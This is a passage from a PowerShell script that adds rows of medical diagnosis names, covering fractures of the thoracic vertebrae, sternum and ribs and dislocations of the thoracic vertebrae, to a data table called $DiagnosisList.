nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of T7-T8 thoracic vertebra","Other fracture of T7-T8 thoracic vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of T7-T8 vertebra","Unspecified fracture of T7-T8 vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of T7-T8 vertebra","Unspecified fracture of T7-T8 vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of T7-T8 vertebra","Unspecified fracture of T7-T8 vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of T7-T8 vertebra","Unspecified fracture of T7-T8 vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of T7-T8 vertebra","Unspecified fracture of T7-T8 vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of T7-T8 vertebra","Unspecified fracture of T7-T8 vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Wedge compression fracture of T9-T10 vertebra","Wedge compression fracture of T9-T10 vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Wedge compression fracture of T9-T10 vertebra","Wedge compression fracture of T9-T10 vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Wedge compression fracture of T9-T10 vertebra","Wedge compression fracture of T9-T10 vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Wedge compression fracture of T9-T10 vertebra","Wedge compression fracture of T9-T10 vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Wedge compression fracture of T9-T10 vertebra","Wedge compression fracture of T9-T10 vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Wedge compression fracture of T9-T10 vertebra","Wedge compression fracture of T9-T10 vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of T9-T10 vertebra","Stable burst fracture of T9-T10 vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of T9-T10 vertebra","Stable burst fracture of T9-T10 vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of T9-T10 vertebra","Stable burst fracture of T9-T10 vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of T9-T10 vertebra","Stable burst fracture of T9-T10 vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of T9-T10 vertebra","Stable burst fracture of T9-T10 vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of T9-T10 vertebra","Stable burst fracture of T9-T10 vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of T9-T10 vertebra","Unstable burst fracture of T9-T10 vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of T9-T10 vertebra","Unstable burst fracture of T9-T10 vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of T9-T10 vertebra","Unstable burst fracture of T9-T10 vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of T9-T10 vertebra","Unstable burst fracture of T9-T10 vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of T9-T10 vertebra","Unstable burst fracture of T9-T10 vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of T9-T10 vertebra","Unstable burst fracture of T9-T10 vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of T9-T10 vertebra","Other fracture of T9-T10 vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of T9-T10 vertebra","Other fracture of T9-T10 vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of T9-T10 vertebra","Other fracture of T9-T10 vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of T9-T10 vertebra","Other fracture of T9-T10 vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of T9-T10 vertebra","Other fracture of T9-T10 vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of T9-T10 vertebra","Other fracture of T9-T10 vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of T9-T10 vertebra","Unspecified fracture of T9-T10 vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of T9-T10 vertebra","Unspecified fracture of T9-T10 vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of T9-T10 vertebra","Unspecified fracture of T9-T10 vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of T9-T10 vertebra","Unspecified fracture of T9-T10 vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of T9-T10 vertebra","Unspecified fracture of T9-T10 vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of T9-T10 vertebra","Unspecified fracture of T9-T10 vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Wedge compression fracture of T11-T12 vertebra","Wedge compression fracture of T11-T12 vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Wedge compression fracture of T11-T12 vertebra","Wedge compression fracture of T11-T12 vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Wedge compression fracture of T11-T12 vertebra","Wedge compression fracture of T11-T12 vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Wedge compression fracture of T11-T12 vertebra","Wedge compression fracture of T11-T12 vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Wedge compression fracture of T11-T12 vertebra","Wedge compression fracture of T11-T12 vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Wedge compression fracture of T11-T12 vertebra","Wedge compression fracture of T11-T12 vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of T11-T12 vertebra","Stable burst fracture of T11-T12 vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of T11-T12 vertebra","Stable burst fracture of T11-T12 vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of T11-T12 vertebra","Stable burst fracture of T11-T12 vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of T11-T12 vertebra","Stable burst fracture of T11-T12 vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of T11-T12 vertebra","Stable burst fracture of T11-T12 vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of T11-T12 vertebra","Stable burst fracture of T11-T12 vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of T11-T12 vertebra","Unstable burst fracture of T11-T12 vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of T11-T12 vertebra","Unstable burst fracture of T11-T12 vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of T11-T12 vertebra","Unstable burst fracture of T11-T12 vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of T11-T12 vertebra","Unstable burst fracture of T11-T12 vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of T11-T12 vertebra","Unstable burst fracture of T11-T12 vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of T11-T12 vertebra","Unstable burst fracture of T11-T12 vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of T11-T12 vertebra","Other fracture of T11-T12 vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of T11-T12 vertebra","Other fracture of T11-T12 vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of T11-T12 vertebra","Other fracture of T11-T12 vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of T11-T12 vertebra","Other fracture of T11-T12 vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of T11-T12 vertebra","Other fracture of T11-T12 vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of T11-T12 vertebra","Other fracture of T11-T12 vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of T11-T12 vertebra","Unspecified fracture of T11-T12 vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of T11-T12 vertebra","Unspecified fracture of T11-T12 vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of T11-T12 vertebra","Unspecified fracture of T11-T12 vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of T11-T12 vertebra","Unspecified fracture of T11-T12 vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of T11-T12 vertebra","Unspecified fracture of T11-T12 vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of T11-T12 vertebra","Unspecified fracture of T11-T12 vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of sternum","Unspecified fracture of sternum, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of sternum","Unspecified fracture of sternum, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of sternum","Unspecified fracture of sternum, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of sternum","Unspecified fracture of sternum, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of sternum","Unspecified fracture of sternum, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of sternum","Unspecified fracture of sternum, sequela") + $null = $DiagnosisList.Rows.Add("Fracture of manubrium","Fracture of manubrium, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Fracture of manubrium","Fracture of manubrium, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Fracture of manubrium","Fracture of manubrium, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of manubrium","Fracture of manubrium, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of manubrium","Fracture of manubrium, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of manubrium","Fracture of manubrium, sequela") + $null = $DiagnosisList.Rows.Add("Fracture of body of sternum","Fracture of body of sternum, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Fracture of body of sternum","Fracture of body of sternum, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Fracture of body of sternum","Fracture of body of sternum, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of body of sternum","Fracture of body of sternum, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of body of sternum","Fracture of body of sternum, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of body of sternum","Fracture of body of sternum, sequela") + $null = $DiagnosisList.Rows.Add("Sternal manubrial dissociation","Sternal manubrial dissociation, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Sternal manubrial dissociation","Sternal manubrial dissociation, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Sternal manubrial dissociation","Sternal manubrial dissociation, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Sternal manubrial dissociation","Sternal manubrial dissociation, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Sternal manubrial dissociation","Sternal manubrial dissociation, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Sternal manubrial dissociation","Sternal manubrial dissociation, sequela") + $null = $DiagnosisList.Rows.Add("Fracture of xiphoid process","Fracture of xiphoid process, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Fracture of xiphoid process","Fracture of xiphoid process, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Fracture of xiphoid process","Fracture of xiphoid process, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of xiphoid process","Fracture of xiphoid process, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of xiphoid process","Fracture of xiphoid process, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of xiphoid process","Fracture of xiphoid process, sequela") + $null = $DiagnosisList.Rows.Add("Fracture of one rib, right side","Fracture of one rib, right side, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Fracture of one rib, right side","Fracture of one rib, right side, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Fracture of one rib, right side","Fracture of one rib, right side, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of one rib, right side","Fracture of one rib, right side, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of one rib, right side","Fracture of one rib, right side, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of one rib, right side","Fracture of one rib, right side, sequela") + $null = $DiagnosisList.Rows.Add("Fracture of one rib, left side","Fracture of one rib, left side, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Fracture of one rib, left side","Fracture of one rib, left side, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Fracture of one rib, left side","Fracture of one rib, left side, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of one rib, left side","Fracture of one rib, left side, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of one rib, left side","Fracture of one rib, left side, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of one rib, left side","Fracture of one rib, left side, sequela") + $null = $DiagnosisList.Rows.Add("Fracture of one rib, unspecified side","Fracture of one rib, unspecified side, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Fracture of one rib, unspecified side","Fracture of one rib, unspecified side, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Fracture of one rib, unspecified side","Fracture of one rib, unspecified side, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of one rib, unspecified side","Fracture of one rib, unspecified side, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of one rib, unspecified side","Fracture of one rib, unspecified side, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of one rib, unspecified side","Fracture of one rib, unspecified side, sequela") + $null = $DiagnosisList.Rows.Add("Multiple fractures of ribs, right side","Multiple fractures of ribs, right side, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Multiple fractures of ribs, right side","Multiple fractures of ribs, right side, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Multiple fractures of ribs, right side","Multiple fractures of ribs, right side, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Multiple fractures of ribs, right side","Multiple fractures of ribs, right side, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Multiple fractures of ribs, right side","Multiple fractures of ribs, right side, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Multiple fractures of ribs, right side","Multiple fractures of ribs, right side, sequela") + $null = $DiagnosisList.Rows.Add("Multiple fractures of ribs, left side","Multiple fractures of ribs, left side, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Multiple fractures of ribs, left side","Multiple fractures of ribs, left side, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Multiple fractures of ribs, left side","Multiple fractures of ribs, left side, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Multiple fractures of ribs, left side","Multiple fractures of ribs, left side, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Multiple fractures of ribs, left side","Multiple fractures of ribs, left side, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Multiple fractures of ribs, left side","Multiple fractures of ribs, left side, sequela") + $null = $DiagnosisList.Rows.Add("Multiple fractures of ribs, bilateral","Multiple fractures of ribs, bilateral, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Multiple fractures of ribs, bilateral","Multiple fractures of ribs, bilateral, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Multiple fractures of ribs, bilateral","Multiple fractures of ribs, bilateral, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Multiple fractures of ribs, bilateral","Multiple fractures of ribs, bilateral, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Multiple fractures of ribs, bilateral","Multiple fractures of ribs, bilateral, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Multiple fractures of ribs, bilateral","Multiple fractures of ribs, bilateral, sequela") + $null = $DiagnosisList.Rows.Add("Multiple fractures of ribs, unspecified side","Multiple fractures of ribs, unspecified side, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Multiple fractures of ribs, unspecified side","Multiple fractures of ribs, unspecified side, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Multiple fractures of ribs, unspecified side","Multiple fractures of ribs, unspecified side, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Multiple fractures of ribs, unspecified side","Multiple fractures of ribs, unspecified side, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Multiple fractures of ribs, unspecified side","Multiple fractures of ribs, unspecified side, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Multiple fractures of ribs, unspecified side","Multiple fractures of ribs, unspecified side, sequela") + $null = $DiagnosisList.Rows.Add("Flail chest","Flail chest, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Flail chest","Flail chest, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Flail chest","Flail chest, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Flail chest","Flail chest, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Flail chest","Flail chest, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Flail chest","Flail chest, sequela") + $null = $DiagnosisList.Rows.Add("Fracture of bony thorax, part unspecified","Fracture of bony thorax, part unspecified, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Fracture of bony thorax, part unspecified","Fracture of bony thorax, part unspecified, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Fracture of bony thorax, part unspecified","Fracture of bony thorax, part unspecified, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of bony thorax, part unspecified","Fracture of bony thorax, part unspecified, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of bony thorax, part unspecified","Fracture of bony thorax, part unspecified, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of bony thorax, part unspecified","Fracture of bony thorax, part unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of thoracic intervertebral disc","Traumatic rupture of thoracic intervertebral disc, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of thoracic intervertebral disc","Traumatic rupture of thoracic intervertebral disc, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of thoracic intervertebral disc","Traumatic rupture of thoracic intervertebral disc, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of unspecified thoracic vertebra","Subluxation of unspecified thoracic vertebra, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of unspecified thoracic vertebra","Subluxation of unspecified thoracic vertebra, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of unspecified thoracic vertebra","Subluxation of unspecified thoracic vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of unspecified thoracic vertebra","Dislocation of unspecified thoracic vertebra, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of unspecified thoracic vertebra","Dislocation of unspecified thoracic vertebra, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of unspecified thoracic vertebra","Dislocation of unspecified thoracic vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of T1/T2 thoracic vertebra","Subluxation of T1/T2 thoracic vertebra, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of T1/T2 thoracic vertebra","Subluxation of T1/T2 thoracic vertebra, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of T1/T2 thoracic vertebra","Subluxation of T1/T2 thoracic vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of T1/T2 thoracic vertebra","Dislocation of T1/T2 thoracic vertebra, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of T1/T2 thoracic vertebra","Dislocation of T1/T2 thoracic vertebra, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of T1/T2 thoracic vertebra","Dislocation of T1/T2 thoracic vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of T2/T3 thoracic vertebra","Subluxation of T2/T3 thoracic vertebra, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of T2/T3 thoracic vertebra","Subluxation of T2/T3 thoracic vertebra, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of T2/T3 thoracic vertebra","Subluxation of T2/T3 thoracic vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of T2/T3 thoracic vertebra","Dislocation of T2/T3 thoracic vertebra, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of T2/T3 thoracic vertebra","Dislocation of T2/T3 thoracic vertebra, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of T2/T3 thoracic vertebra","Dislocation of T2/T3 thoracic vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of T3/T4 thoracic vertebra","Subluxation of T3/T4 thoracic vertebra, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of T3/T4 thoracic vertebra","Subluxation of T3/T4 thoracic vertebra, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of T3/T4 thoracic vertebra","Subluxation of T3/T4 thoracic vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of T3/T4 thoracic vertebra","Dislocation of T3/T4 thoracic vertebra, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of T3/T4 thoracic vertebra","Dislocation of T3/T4 thoracic vertebra, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of T3/T4 thoracic vertebra","Dislocation of T3/T4 thoracic vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of T4/T5 thoracic vertebra","Subluxation of T4/T5 thoracic vertebra, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of T4/T5 thoracic vertebra","Subluxation of T4/T5 thoracic vertebra, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of T4/T5 thoracic vertebra","Subluxation of T4/T5 thoracic vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of T4/T5 thoracic vertebra","Dislocation of T4/T5 thoracic vertebra, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of T4/T5 thoracic vertebra","Dislocation of T4/T5 thoracic vertebra, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of T4/T5 thoracic vertebra","Dislocation of T4/T5 thoracic vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of T5/T6 thoracic vertebra","Subluxation of T5/T6 thoracic vertebra, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of T5/T6 thoracic vertebra","Subluxation of T5/T6 thoracic vertebra, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of T5/T6 thoracic vertebra","Subluxation of T5/T6 thoracic vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of T5/T6 thoracic vertebra","Dislocation of T5/T6 thoracic vertebra, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of T5/T6 thoracic vertebra","Dislocation of T5/T6 thoracic vertebra, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of T5/T6 thoracic vertebra","Dislocation of T5/T6 thoracic vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of T6/T7 thoracic vertebra","Subluxation of T6/T7 thoracic vertebra, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of T6/T7 thoracic vertebra","Subluxation of T6/T7 thoracic vertebra, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of T6/T7 thoracic vertebra","Subluxation of T6/T7 thoracic vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of T6/T7 thoracic vertebra","Dislocation of T6/T7 thoracic vertebra, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of T6/T7 thoracic vertebra","Dislocation of T6/T7 thoracic vertebra, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of T6/T7 thoracic vertebra","Dislocation of T6/T7 thoracic vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of T7/T8 thoracic vertebra","Subluxation of T7/T8 thoracic vertebra, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of T7/T8 thoracic vertebra","Subluxation of T7/T8 thoracic vertebra, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of T7/T8 thoracic vertebra","Subluxation of T7/T8 thoracic vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of T7/T8 thoracic vertebra","Dislocation of T7/T8 thoracic vertebra, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of T7/T8 thoracic vertebra","Dislocation of T7/T8 thoracic vertebra, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of T7/T8 thoracic vertebra","Dislocation of T7/T8 thoracic vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of T8/T9 thoracic vertebra","Subluxation of T8/T9 thoracic vertebra, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of T8/T9 thoracic vertebra","Subluxation of T8/T9 thoracic vertebra, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of T8/T9 thoracic vertebra","Subluxation of T8/T9 thoracic vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of T8/T9 thoracic vertebra","Dislocation of T8/T9 thoracic vertebra, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of T8/T9 thoracic vertebra","Dislocation of T8/T9 thoracic vertebra, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of T8/T9 thoracic vertebra","Dislocation of T8/T9 thoracic vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of T9/T10 thoracic vertebra","Subluxation of T9/T10 thoracic vertebra, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of T9/T10 thoracic vertebra","Subluxation of T9/T10 thoracic vertebra, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of T9/T10 thoracic vertebra","Subluxation of T9/T10 thoracic vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of T9/T10 thoracic vertebra","Dislocation of T9/T10 thoracic vertebra, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of T9/T10 thoracic vertebra","Dislocation of T9/T10 thoracic vertebra, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of T9/T10 thoracic vertebra","Dislocation of T9/T10 thoracic vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of T10/T11 thoracic vertebra","Subluxation of T10/T11 thoracic vertebra, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of T10/T11 thoracic vertebra","Subluxation of T10/T11 thoracic vertebra, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of T10/T11 thoracic vertebra","Subluxation of T10/T11 thoracic vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of T10/T11 thoracic vertebra","Dislocation of T10/T11 thoracic vertebra, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of T10/T11 thoracic vertebra","Dislocation of T10/T11 thoracic vertebra, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of T10/T11 thoracic vertebra","Dislocation of T10/T11 thoracic vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of T11/T12 thoracic vertebra","Subluxation of T11/T12 thoracic vertebra, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of T11/T12 thoracic vertebra","Subluxation of T11/T12 thoracic vertebra, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of T11/T12 thoracic vertebra","Subluxation of T11/T12 thoracic vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of T11/T12 thoracic vertebra","Dislocation of T11/T12 thoracic vertebra, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of T11/T12 thoracic vertebra","Dislocation of T11/T12 thoracic vertebra, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of T11/T12 thoracic vertebra","Dislocation of T11/T12 thoracic vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of 